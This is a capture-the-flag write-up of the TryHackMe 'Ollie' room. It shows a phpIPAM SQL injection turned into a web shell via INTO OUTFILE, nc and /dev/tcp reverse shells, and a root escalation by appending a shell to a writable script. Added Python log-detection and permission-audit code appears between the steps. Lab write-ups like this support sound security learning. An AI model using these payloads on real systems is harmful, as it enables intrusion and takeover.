TryHackMe: Ollie

Today we will take a look at TryHackMe: Ollie. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sT -p- -T5 -vv -oN nmap/all_ports 10.10.86.146

Port 1337 enumeration

Command: nc IP 1337

Yes, this is a simple chat exchange. At the end of it we get the credentials we need.

I tried to log in to Ollie with SSH, but it didn’t work.

Let’s take a look at the website now.

It is a simple login page. Let’s enter with the credential we have.

I did some research on phpIPAM, and it turned out that version 1.4.4 is vulnerable to SQL injection.

Let's check it.

Go to the Routing section

Go to the example in the Peer Name section, click the Actions button and select Subnet mapping.

Now let’s check the vulnerability.

Command: "union select @@version,2,user(),4 -- -

It works. Now let's turn it into RCE by writing a web shell with INTO OUTFILE.

Command: " union select null,null,null,"<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php" -- -

Time for the reverse shell. Keep in mind that the command has to be URL-encoded when you type it into the URL.

Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f

rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20IP%204242%20%3E%2Ftmp%2Ff%0A
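From the defender's side, every step above leaves a trace in the web server access log: a UNION query, an INTO OUTFILE write containing a PHP tag, and finally a URL-encoded shell pipeline hitting the dropped file. The following detector is an added example, not code from the writeup or from phpIPAM; the log lines are constructed and the rule names are my own. It URL-decodes each request (repeatedly, to catch double encoding) and reports which indicators fire, while a benign query containing the word "union" on its own is not flagged.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in common log format (not from any real host).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /app/index.php?page=subnets&id=3 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /app/index.php?id=%22union%20select%20%40%40version%2C2%2Cuser()%2C4%20--%20- HTTP/1.1" 200 734
10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "GET /app/index.php?id=%22%20union%20select%20null%2Cnull%2Cnull%2C%22%3C%3Fphp%20system(%24_GET%5B%27cmd%27%5D)%3B%20%3F%3E%22%20into%20outfile%20%22%2Fvar%2Fwww%2Fhtml%2Fbackdoor.php%22%20--%20- HTTP/1.1" 200 734
10.0.0.9 - - [01/Jan/2024:10:00:31 +0000] "GET /backdoor.php?cmd=rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.0.0.9%204242%20%3E%2Ftmp%2Ff HTTP/1.1" 200 0
10.0.0.7 - - [01/Jan/2024:10:01:02 +0000] "GET /app/index.php?page=tools&section=search&q=union%20station HTTP/1.1" 200 900
"""

# Extracts the request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) HTTP/')

# Indicator rules (name, compiled regex), applied to the fully decoded request.
RULES = [
    # UNION ... SELECT with a bounded gap; "union station" alone does not fire.
    ("SQLI_UNION", re.compile(r"\bunion\b[^\n]{0,40}?\bselect\b", re.I)),
    # File write via INTO OUTFILE / INTO DUMPFILE.
    ("SQLI_OUTFILE", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    # PHP open tag inside a request: a web shell being written or uploaded.
    ("WEBSHELL_WRITE", re.compile(r"<\?php", re.I)),
    # Shell pipeline primitives typical of a reverse shell payload.
    ("CMD_PIPELINE", re.compile(r"mkfifo|/bin/(?:ba)?sh|/dev/tcp/", re.I)),
]


def decode_request(line: str, max_rounds: int = 3) -> str:
    """Return the URL-decoded request target, decoding repeatedly for double encoding."""
    m = REQUEST_RE.search(line)
    if not m:
        return ""
    target = m.group(1)
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(line: str) -> list:
    """Return the names of all rules that match the decoded request in this log line."""
    decoded = decode_request(line)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan(log_text: str) -> list:
    """Return (1-based line number, matched rule names) for every line with at least one hit."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        rules = classify(line)
        if rules:
            hits.append((lineno, rules))
    return hits


if __name__ == "__main__":
    for lineno, rules in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(rules)}")
```

Decoding before matching is the important design choice: the raw log line for the reverse shell contains no readable `mkfifo` or `/bin/sh`, only percent-encoded bytes, so a rule applied to the undecoded text would miss it.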

As soon as I received the reverse shell, I switched to the ollie user with the credentials obtained earlier.

Privilege Escalation

Command: find / -group ollie 2>/dev/null

There are several interesting results, but this one stood out.

After checking it, I saw that it runs as root, so I appended a reverse shell command to it.

Command: echo 'bash -i >& /dev/tcp/IP/4444 0>&1' >> /usr/bin/feedme

And now we are root.
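The root cause of this escalation is a program that root executes but that a non-root group is allowed to modify. Auditing for that condition is straightforward. The script below is an added example, not part of the writeup or the machine: it walks the given directories and reports regular files that are executable and writable by group or others, skipping symlinks (whose own mode bits are always wide open). `make_demo_tree` builds a constructed temporary directory that mirrors the case on this box, a `feedme` script with mode 0775 next to correctly permissioned files, so the audit can be run offline.

```python
import os
import stat
import tempfile


def find_writable_executables(roots):
    """Return sorted (path, octal mode) for regular files under roots that are
    executable by anyone and writable by group or others."""
    flagged = []
    writable_by_nonowner = stat.S_IWGRP | stat.S_IWOTH
    executable = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: never follow symlinks
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue  # symlinks, sockets, etc. are not what root runs
                mode = stat.S_IMODE(st.st_mode)
                if mode & writable_by_nonowner and mode & executable:
                    flagged.append((path, format(mode, "04o")))
    return sorted(flagged)


def make_demo_tree():
    """Constructed demo directory (not the real /usr/bin): one group-writable
    executable, one correctly permissioned executable, one writable non-executable."""
    base = tempfile.mkdtemp(prefix="perm_audit_demo_")
    samples = {
        "feedme": (b"#!/bin/sh\necho feeding\n", 0o775),  # the dangerous case
        "safe_tool": (b"#!/bin/sh\necho ok\n", 0o755),    # executable, owner-writable only
        "notes.txt": (b"just data\n", 0o666),             # writable but not executable
    }
    for name, (content, mode) in samples.items():
        path = os.path.join(base, name)
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return base


def demo():
    """Build the demo tree and return what the audit flags in it."""
    return find_writable_executables([make_demo_tree()])


if __name__ == "__main__":
    # Stand-alone use: audit the usual system executable directories.
    for path, mode in find_writable_executables(["/usr/local/bin", "/usr/bin", "/usr/sbin"]):
        print(f"{mode} {path}")
```

On a real host, run it as root so that every directory is readable, and treat any hit in a directory that a cron job, systemd unit or setuid wrapper executes from as a finding to fix (chown to root and chmod 755), not just to note.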

"If you have any questions or comments, please do not hesitate to write. Have a good day."


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
